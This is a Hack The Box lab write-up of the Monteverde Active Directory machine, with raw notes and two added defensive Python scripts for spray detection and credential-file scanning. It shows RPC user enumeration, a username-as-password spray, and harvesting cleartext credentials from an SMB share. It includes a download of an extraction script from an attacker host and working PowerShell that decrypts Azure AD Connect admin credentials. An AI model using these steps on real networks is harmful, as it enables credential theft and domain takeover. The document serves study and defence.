Hack The Box · Lab
Medium · Windows · Active Directory · Password Attacks

Target: 10.10.10.172 | Difficulty: Medium | OS: Windows | Domain: MEGABANK.LOCAL

Environment Setup

export IP=10.10.10.172
export DOMAIN=MEGABANK.LOCAL
echo "$IP monteverde.megabank.local megabank.local" | sudo tee -a /etc/hosts

Step 1 — Port Scan & Service Enumeration

Why: Identify exposed services and attack surface on this Domain Controller.

nmap -sCV -p- --min-rate 5000 -oN monteverde.nmap $IP

Output:

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws

Key findings: Pure DC profile, no HTTP. SMB + WinRM exposed. Start with RPC null session to enumerate domain users.

Step 2 — RPC Null Session & User Enumeration

Why: Anonymous RPC binds often allow domain user enumeration on misconfigured DCs — a full user list enables targeted attacks.

rpcclient -U "" -N $IP -c "enumdomusers"

Output:

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0x642]
user:[svc-ata] rid:[0x643]
user:[svc-bexec] rid:[0x644]
user:[svc-netapp] rid:[0x645]
user:[dgalanos] rid:[0x646]
user:[roleary] rid:[0x647]
user:[smorgan] rid:[0x648]

# Extract usernames to file
rpcclient -U "" -N $IP -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v '0x' | tr -d '[]' > users.txt

Key findings: 12 domain users enumerated. Service accounts (svc-*) and AAD_987d7f2f57d2 (Azure AD Connect) confirm Azure AD Connect is deployed.

Step 3 — Password Spray (Username = Password)

Why: Service/batch accounts are frequently provisioned with the username as the initial password — a common low-effort misconfiguration.

crackmapexec smb $IP -u users.txt -p users.txt --no-bruteforce --continue-on-success

Output:

SMB  10.10.10.172  445  MONTEVERDE  [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs

Key findings: SABatchJobs:SABatchJobs — username equals password. Valid domain credentials obtained.
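The defender's side of Step 3, as an added example that is not part of this writeup or of any tool it uses: a spray like this leaves a distinctive trace in the Domain Controller's Security log, many different account names failing (Event ID 4625) from one source address inside a short window, followed by a success (Event ID 4624) for the one account whose password matched. The events below are constructed to mimic that (the source addresses and the flat `time`/`id`/`user`/`src` field names are assumptions); in practice `detect_spray()` would be fed parsed 4624/4625 records from the DC or a SIEM.

```python
"""Password-spray detection over Windows logon events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Account names as enumerated over the RPC null session in Step 2.
ENUMERATED_USERS = [
    "Administrator", "Guest", "krbtgt", "AAD_987d7f2f57d2", "mhope",
    "SABatchJobs", "svc-ata", "svc-bexec", "svc-netapp", "dgalanos",
    "roleary", "smorgan",
]


def build_sample_events():
    """Constructed sample: one host tries username=password against every
    enumerated account (only SABatchJobs succeeds), plus one benign user on
    another host who mistypes once and then logs in normally."""
    base = datetime(2020, 6, 13, 10, 0, 0)
    events = []
    for i, user in enumerate(ENUMERATED_USERS):
        events.append({
            "time": base + timedelta(seconds=i),
            "id": 4624 if user == "SABatchJobs" else 4625,
            "user": user,
            "src": "10.10.14.5",  # constructed attacker address
        })
    events.append({"time": base + timedelta(minutes=1), "id": 4625,
                   "user": "dgalanos", "src": "10.10.14.9"})
    events.append({"time": base + timedelta(minutes=1, seconds=20), "id": 4624,
                   "user": "dgalanos", "src": "10.10.14.9"})
    return events


def detect_spray(events, window_minutes=5, min_accounts=5):
    """Flag source addresses that fail logons for at least `min_accounts`
    distinct account names within any `window_minutes` window. For each
    flagged source also report which accounts logged on successfully while
    the spray was running: those are the credentials the attacker now holds."""
    window = timedelta(minutes=window_minutes)
    by_src = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_src[ev["src"]].append(ev)

    alerts = {}
    for src, evs in by_src.items():
        failures = [e for e in evs if e["id"] == 4625]
        if not failures:
            continue
        # Sliding window over the time-sorted failures, counting distinct accounts.
        in_window = defaultdict(int)
        start = 0
        peak = 0
        for ev in failures:
            in_window[ev["user"]] += 1
            while ev["time"] - failures[start]["time"] > window:
                old = failures[start]["user"]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            peak = max(peak, len(in_window))
        if peak < min_accounts:
            continue
        first, last = failures[0]["time"], failures[-1]["time"]
        hits = sorted({
            e["user"] for e in evs
            if e["id"] == 4624 and first - window <= e["time"] <= last + window
        })
        alerts[src] = {"distinct_failed_accounts": peak, "successful_accounts": hits}
    return alerts


if __name__ == "__main__":
    for src, info in detect_spray(build_sample_events()).items():
        print(f"spray from {src}: {info['distinct_failed_accounts']} accounts tried, "
              f"successful logons: {info['successful_accounts']}")
```

The distinct-account count is what separates a spray from a user who mistypes a password: the benign host fails once for one account and is never flagged, while the spraying host is flagged together with the single account it actually obtained. The same pattern is why the notes' "No account lockout" finding matters: one attempt per account never trips a per-account lockout, so the detection has to key on the source, not the account.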

Step 4 — SMB Enumeration as SABatchJobs

Why: Authenticated SMB access may expose user home directories or Azure-related shares with sensitive configuration files.

smbclient -L //$IP -U 'SABatchJobs%SABatchJobs'

Output:

Sharename       Type  Comment
ADMIN$          Disk  Remote Admin
azure_uploads   Disk
C$              Disk  Default share
E$              Disk  Default share
IPC$            IPC   Remote IPC
NETLOGON        Disk  Logon server share
SYSVOL          Disk  Logon server share
users$          Disk

# Browse users$ share
smbclient //$IP/users$ -U 'SABatchJobs%SABatchJobs'
smb: \> ls
# mhope directory present
smb: \> cd mhope
smb: \mhope\> ls
# azure.xml found
smb: \mhope\> get azure.xml
cat azure.xml

Output:

<Objs Version="1.1.0.1" ...>
  <Obj ...>
    <TN refId="0"><T>Microsoft.Azure.ActiveDirectory.Synchronization.Framework...</T></TN>
    <ToString>Microsoft.Azure....</ToString>
    <Props>
      <S N="Password">4n0therD4y@n0th3r$</S>
      <S N="UserName">MEGABANK\mhope</S>
    </Props>
  </Obj>
</Objs>

Key findings: PowerShell credential export file found in mhope's home directory. Cleartext credentials: mhope:4n0therD4y@n0th3r$.
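As an added example (not part of this writeup): azure.xml is a CliXml serialisation, the format Export-Clixml writes, of a PSADPasswordCredential object, and its Password property is a plain `<S>` string, i.e. cleartext. By contrast, a PSCredential exported with Export-Clixml on Windows stores the password as an `<SS>` SecureString, which PowerShell writes as DPAPI-protected hex bound to the exporting user and machine. The scanner below walks a CliXml document and reports every sensitive-looking property with its protection level, so a share audit can pick out files like this one. The PSCredential sample and its hex blob are constructed for the demo; the azure.xml sample is the one from the page, abridged to the relevant properties.

```python
"""Scanner for PowerShell CliXml exports holding credential material (added example)."""
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
# Property names that should never appear as a plain <S> string.
SENSITIVE_WORDS = ("password", "secret", "token")


def ns(tag):
    """Qualify a CliXml element name with the PowerShell serialisation namespace."""
    return f"{{{PS_NS}}}{tag}"


# The azure.xml found on the users$ share, abridged to the relevant properties.
AZURE_XML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>"""

# Constructed: the shape Export-Clixml gives a PSCredential on Windows. The
# <SS> value is a made-up hex blob standing in for the DPAPI-protected SecureString.
PSCREDENTIAL_XML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">MEGABANK\\svc-example</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000</SS>
    </Props>
  </Obj>
</Objs>"""


def scan_clixml(xml_text):
    """Return one finding per sensitive property: the serialised .NET type,
    the property name, whether it is cleartext (<S>) or a DPAPI-protected
    SecureString (<SS>), and a redacted preview of the value."""
    root = ET.fromstring(xml_text)
    findings = []
    for obj in root.iter(ns("Obj")):
        type_elem = obj.find(f"{ns('TN')}/{ns('T')}")
        type_name = type_elem.text if type_elem is not None else "<unknown>"
        props = obj.find(ns("Props"))
        if props is None:
            continue
        for prop in props:
            if prop.tag == ns("S"):
                protection = "cleartext"
            elif prop.tag == ns("SS"):
                protection = "dpapi-securestring"
            else:
                continue  # dates, GUIDs, numbers and nested objects are not secrets
            name = prop.get("N", "")
            if not any(word in name.lower() for word in SENSITIVE_WORDS):
                continue
            value = prop.text or ""
            findings.append({
                "type": type_name,
                "property": name,
                "protection": protection,
                "preview": value[:2] + "***",  # never echo the full secret into a report
            })
    return findings


def cleartext_count(findings):
    """Number of findings that expose a secret with no protection at all."""
    return sum(1 for f in findings if f["protection"] == "cleartext")


if __name__ == "__main__":
    samples = (("azure.xml", AZURE_XML), ("constructed PSCredential export", PSCREDENTIAL_XML))
    for label, doc in samples:
        for f in scan_clixml(doc):
            print(f"{label}: {f['type']}.{f['property']} is {f['protection']} ({f['preview']})")
```

Run over a share, a report from this scanner separates files that merely need cleanup (an `<SS>` blob is only usable by the user and machine that wrote it) from files that are an immediate credential leak to anyone with read access to the share, which is exactly what `users$` granted to SABatchJobs here.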

Step 5 — WinRM Access as mhope

Why: Port 5985 is open — test if mhope is in Remote Management Users.

evil-winrm -i $IP -u mhope -p '4n0therD4y@n0th3r$'

Output:

Evil-WinRM shell v3.x
*Evil-WinRM* PS C:\Users\mhope\Documents>
type C:\Users\mhope\Desktop\user.txt

Key findings: Shell as mhope. User flag captured.

Step 6 — Identify Privilege via Group Membership

Why: Enumerate mhope's group memberships to understand available privilege escalation paths.

*Evil-WinRM* PS> whoami /groups

Output:

GROUP INFORMATION
MEGABANK\Azure Admins

Key findings: mhope is in Azure Admins — the group associated with Azure AD Connect service account management. Azure AD Connect stores encrypted Domain Admin credentials to synchronize AD with Azure — extractable if we control an Azure Admin account.

Step 7 — Azure AD Connect Credential Extraction

Why: Azure AD Connect stores encrypted credentials for its synchronization service account (which typically has DCSync rights) in a local SQL database. As Azure Admin, mhope can query ADSync and decrypt the stored credentials.

# Confirm Azure AD Connect service and SQL instance
*Evil-WinRM* PS> Get-Service ADSync
*Evil-WinRM* PS> sqlcmd -S LOCALHOST -Q "SELECT name FROM sys.databases"
# ADSync database present

# Upload and run the Azure AD Connect credential extraction script
# Based on @_xpn_ technique (blog.xpnsec.com/azuread-connect-for-redteam)
*Evil-WinRM* PS> Invoke-WebRequest http://10.10.14.x/azuread_decrypt_msol.ps1 -OutFile azuread_decrypt.ps1
*Evil-WinRM* PS> . .\azuread_decrypt.ps1
# Core extraction technique (manual approach):
$client = New-Object System.Data.SqlClient.SqlConnection -ArgumentList `
  "Server=127.0.0.1;Database=ADSync;Integrated Security=True"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id    = $reader.GetInt32(0)
$instance  = $reader.GetGuid(1)
$entropy   = $reader.GetGuid(2)
$reader.Close()

$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type='AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypt  = $reader.GetString(1)
$reader.Close()

# Decrypt using DPAPI
Add-Type -AssemblyName System.Security
$password_bytes  = [Convert]::FromBase64String(($crypt | Select-Xml '//encrypted-attributes/attribute[@name="password"]').Node.InnerText)
$decrypted_bytes = [Security.Cryptography.ProtectedData]::Unprotect($password_bytes, $entropy.ToByteArray(), [Security.Cryptography.DataProtectionScope]::LocalMachine)
[Text.Encoding]::Unicode.GetString($decrypted_bytes)

Output:

administrator
d0m@in4dminyeah!

Key findings: Azure AD Connect DPAPI-encrypted credentials decrypted: administrator:d0m@in4dminyeah!.

Step 8 — WinRM as Administrator → Domain Admin

Why: Use the extracted administrator credentials to get a Domain Admin shell.

evil-winrm -i $IP -u administrator -p 'd0m@in4dminyeah!'

Output:

*Evil-WinRM* PS C:\Users\Administrator\Documents>
type C:\Users\Administrator\Desktop\root.txt

Key findings: Full Domain Admin access. Root flag captured.

Credentials

Username       Password            Source
SABatchJobs    SABatchJobs         Password spray (username = password)
mhope          4n0therD4y@n0th3r$  azure.xml on users$ SMB share
administrator  d0m@in4dminyeah!    Azure AD Connect DPAPI decrypt

Full Attack Chain

RPC Null Session → rpcclient enumdomusers
        │
        ▼ Password spray (username = password)
SABatchJobs:SABatchJobs
        │
        ▼ smbclient users$ share → mhope/azure.xml
mhope:4n0therD4y@n0th3r$
        │
        ▼ evil-winrm :5985
USER FLAG
        │
        ▼ whoami /groups → Azure Admins
Azure AD Connect installed (AAD_987d7f2f57d2)
        │
        ▼ SQL query ADSync → mms_server_configuration + mms_management_agent
DPAPI Decrypt encrypted_configuration
        │
        ▼ Extract domain admin credentials
administrator:d0m@in4dminyeah!
        │
        ▼ evil-winrm :5985
DOMAIN ADMIN / ROOT FLAG

© 0xNRG — Monteverde pwned — 2020-06-13

notes

NMAP

```shell
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49676/tcp open  unknown
49693/tcp open  unknown
```

SMB

Anon Auth Success but null


Guest deactivated

LDAP

Anon Auth Success


Anon Users Enum


```shell
AAD_987d7f2f57d2  # AD Connect?
mhope
SABatchJobs       # Batch Jobs?
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
```


Windapsearch


Let's see who's in the `Remote Management Group`:


```shell
CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
```

Enum4linux

No account lockout

Password Spray

One hit


```shell
SABatchJobs:SABatchJobs
```

SMB AUTH w/ creds success

```shell
Share          Permissions  Remark
-----          -----------  ------
ADMIN$                      Remote Admin
azure_uploads  READ
C$                          Default share
E$                          Default share
IPC$           READ         Remote IPC
NETLOGON       READ         Logon server share
SYSVOL         READ         Logon server share
users$         READ
```


Found File


```shell
//10.10.10.172/users$/mhope/azure.xml
```


```shell
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
```


Password found!


```shell
4n0therD4y@n0th3r$
```


As it was found in mhope's folder, let's assume it's his.


Success


```shell
[+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)
```

EVIL-WINRM as mhope

`mhope` is a member of `Azure Admins`


Also some interesting apps


According to Microsoft, the service responsible for syncing local AD to Azure AD is `ADSync`.


Get-Process and tasklist result in access denied.


Invoking them with PS is also denied.


```shell
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/2/2020   9:36 PM                Common Files
d-----         1/2/2020   2:46 PM                internet explorer
d-----         1/2/2020   2:38 PM                Microsoft Analysis Services
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync
d-----         1/2/2020   2:38 PM                Microsoft SQL Server
```


The registry works, though:


```shell
Get-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\ADSync
```


And we can see the service executable:


```shell
ImagePath        : "C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe"
```


We can issue this to obtain the file and product version:


```shell
Get-ItemProperty -Path "C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe" | Format-list -Property * -Force
```


Let's have a look at the internal port mappings:


```shell
Active Connections
  Proto  Local Address          Foreign Address        State           PID      Offload State
  TCP    10.10.10.172:1433
```


MSSQL, apparently.


Let's extract `$key_id`, `$instance_id` and `$entropy` from the database manually.


```shell
C:\Program Files> sqlcmd -S MONTEVERDE -Q "use ADsync; select instance_id,keyset_id,entropy from mms_server_configuration"
Changed database context to 'ADSync'.
instance_id                          keyset_id   entropy
------------------------------------ ----------- ------------------------------------
1852B527-DD4F-4ECF-B541-EFCCBFF29E31           1 194EC2FC-F186-46CF-B44D-071EB61F49CD

(1 rows affected)
```


We can use [https://blog.xpnsec.com/azuread-connect-for-redteam/](https://blog.xpnsec.com/azuread-connect-for-redteam/) for extraction of creds.

